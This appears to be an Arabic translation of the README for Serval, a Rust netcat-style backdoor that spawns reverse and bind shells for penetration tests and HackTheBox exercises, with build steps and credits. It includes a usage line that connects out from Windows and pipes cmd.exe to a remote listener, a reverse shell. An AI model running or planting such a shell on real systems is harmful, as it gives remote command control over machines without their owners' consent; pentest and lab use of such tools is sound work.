
باب خلفي على نمط Netcat لاختبار الاختراق وتمارين اختبار الاختراق
سيرفال هو أداة ثنائية خفيفة وسهلة الاستخدام لتوليد قذائف عكسية ومربوطة للاختبارات الاختراقية أو تمارين الاختراق. سيرفال متعدد المنصات ويمكن تجميعه لكل من ويندوز 32 و64 بت ولينكس 32 و64 بت. ملاحظة: نظرًا لمرونة Rust، قد يكون من الممكن التجميع لمنصات أخرى (مثل ARM) لكنني لم أختبره على منصات أخرى.
طورت سيرفال لإزالة اعتمادي على Netcat أثناء تحديات HacktheBox لأنه من المزعج العثور على ثنائيات Netcat لويندوز (خاصة مع الخيار -e) ومن الأصعب العثور على ثنائي من مصدر موثوق.
قم بتنزيل المصدر من github
git clone https://github.com/tgadola/serval.git && cd serval-master
*اختياري: قم بتحرير ملف البناء في .cargo/config لإعادة كتابة مسار البناء الخاص بك.
قم ببناء الثنائي لمنصتك الحالية.
cargo build --release
*ملاحظة: الإصدار v1.1.0 يتطلب Rust nightly
يمكنك البناء لمنصات أخرى باستخدام
cargo build --release --target <target-triple>
إذا كنت فردًا يثق بشكل خاص، يمكنك تنزيل الثنائيات المبنية مسبقًا هنا.
افتراضيًا، سيقوم Serval إما بالاستماع أو الاتصال بمنفذ وتوجيه الإدخال والإخراج القياسيين إلى هذا الاتصال. العلم -e سيقوم بتوليد عملية وتوجيه إدخالها وإخراجها عبر الشبكة.
يستمع Serval على جميع الواجهات.
استخدم العلم -H لتفعيل ميزات تحرير السطر وسجل الأوامر!
serval -l 4400 -H
serval.exe <listening ip> <listening port> -q -e cmd.exe
شكر كبير لـ @kkawakam-transferwise وصندوق Rustyline الخاص بهم، والذي يقوم حرفيًا بكل العمل الشاق. تفقد Rustyline!
شكرًا لمبتكري ومساهمي Clap! تفقد Clap.
شكرًا لمبتكري ومساهمي Anyhow! تفقد Anyhow. +1 على اسم الصندوق الرائع.
شكرًا لـ @jaynus على كل نصائحه حول Rust
Apache 2.0. راجع ملف الترخيص لمزيد من المعلومات.